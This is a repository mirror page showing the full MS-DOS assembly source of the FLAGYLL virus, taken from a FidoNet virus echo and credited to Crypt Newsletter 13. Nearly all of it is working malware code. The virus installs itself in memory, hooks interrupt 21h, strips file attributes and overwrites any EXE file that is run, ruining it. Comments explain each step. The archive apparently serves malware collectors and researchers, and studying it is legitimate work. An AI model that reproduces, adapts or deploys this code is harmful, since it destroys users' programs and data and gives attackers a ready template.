Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-28 18:02:48 +00:00
Code Releases Activity
206bedd3f3
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.vir46.asm
vxunderground c227f1121a
Add files via upload
2021-01-12 18:07:35 -06:00

269 lines
7.5 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 36 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : FLAGYLL.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Gilbert Holleman, 2:283/718 (06 Nov 94 17:38)
;* To : Bill Dirks
;* Subj : FLAGYLL.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Gilbert.Holleman@f718.n283.z2.fidonet.org
;FLAGYLL virus - edited for Crypt Newsletter 13
;FLAGYLL is a memory resident, overwriting virus which
;infects and destroys .EXE files on load.
;It updates the infected files time/date stamps to the time of
;infection so it can easily be followed.
;.EXE's infected by FLAGYLL are destroyed. DOS will either
;refuse to load them or FLAGYLL will become resident
;as they execute. These programs are ruined and can only
;be deleted. Because it is so destructive to files, FLAGYLL cannnot
;pose a threat in the wild, and in this respect, it is much
;inferior to the SUSAN virus included in this issue.
.radix 16
cseg segment
model small
assume cs:cseg, ds:cseg, es:cseg
org 100h
oi21 equ endflagyll
filelength equ endflagyll - begin
nameptr equ endflagyll+4
DTA equ endflagyll+8
begin: jmp install_flagyll
; install
install_flagyll:
mov ax,cs ; reduce memory size
dec ax
mov ds,ax
cmp byte ptr ds:[0000],5a ; check if last memory
jne cancel ; block
mov ax,ds:[0003]
sub ax,100 ; decrease memory
mov ds:0003,ax
copy_flagyll:
mov bx,ax ; copy to claimed block
mov ax,es ; PSP
add ax,bx ; virus start in memory
mov es,ax
mov cx,offset endflagyll - begin ; cx = length of virus
mov ax,ds ; restore ds
inc ax
mov ds,ax
lea si,ds:[begin] ; point to start of virus
lea di,es:0100 ; point to destination
rep movsb ; copy virus in memory
hook_21:
mov ds,cx ; hook interrupt 21h
mov si,0084h ;
mov di,offset oi21
mov dx,offset check_exec
lodsw
cmp ax,dx ;
je cancel ; exit, if already installed
stosw
movsw
push es
pop ds
mov ax,2521h ; revector int 21h to virus
int 21h
cancel: ret
check_exec: ; look over loaded files
pushf ; for executables
push es ; push everything onto the
push ds ; stack
push ax
push bx
push dx
cmp ax,04B00h ; is a file being
; executed ?
jne abort ; no, exit
do_infect:
call infect ; then try to infect
abort: ; restore everything
pop dx
pop bx
pop ax
pop ds
pop es
popf
exit:
; exit
jmp dword ptr cs:[oi21]
infect:
jmp over_id ; it's a vanity thing
note: db '-=[Crypt Newsletter 13]=-'
over_id:
mov cs:[name_seg],ds ; this routine
mov cs:[name_off],dx ; essentially grabs
; the name of the file
cld ; clear direction flags
mov word ptr cs:[nameptr],dx ; save pointer to the filename
mov word ptr cs:[nameptr+2],ds
mov ah,2Fh ; get old DTA
int 21h
push es
push bx
push cs ; set new DTA
pop ds
mov dx,offset DTA
mov ah,1Ah
int 21h
call host_ident ; find filename for virus
push di
mov si,offset COM_txt ; is extension 'COM' ?
mov cx,3
rep cmpsb
pop di
jz return ; if so, let it pass by
mov si,offset EXE_txt ; is extension .EXE ?
nop
mov cl,3
rep cmpsb
jnz return
do_exe: ; infect host, destroying it
mov ax,4300h ; clear attributes
mov ds,cs:[name_seg]
mov dx,cs:[name_off]
int 21h
and cl,0FEh
mov ax,4301h
int 21h
mov ds,cs:[name_seg] ; open file read/write
mov dx,cs:[name_off]
mov ax,3D02h
int 21h
jc close_file
push cs
pop ds
mov [handle],ax
mov bx,ax
push cs
pop ds
mov ax,4200h ;set pointer to beginning of host
push cs
pop ds
mov bx,[handle] ;handle to BX
xor cx,cx
xor dx,dx
int 21h
mov ah,40 ;write to file
mov cx,filelength ;virus length in cx
mov dx,100 ;start write at beginning of Flagyll
int 21h ;do it
close_file: mov bx,[handle]
mov ah,03Eh ;close file, name -->BX
int 21h
mov ax,4C00h ;exit to DOS
int 21h
return: mov ah,1Ah
pop dx ; restore old DTA
pop ds
int 21H
ret ; let DOS regain control
host_ident: les di,dword ptr cs:[nameptr] ; finds filename for
mov ch,0FFh ; host selection
mov al,0
repnz scasb
sub di,4
ret
EXE_txt db 'EXE',0 ; extension masks
COM_txt db 'COM',0 ; for host selection
name_seg dw ? ;data buffers for
name_off dw ? ; viral use on the fly
handle dw ?
note2: db 'Flagyll' ; virus name
endflagyll:
cseg ends
end begin
;-+- GEcho 1.10+
; + Origin: Poeldijk, The Netherlands, Europe, Earth (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/3 Enable 32-bit processing
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)
View Git Blame Copy Permalink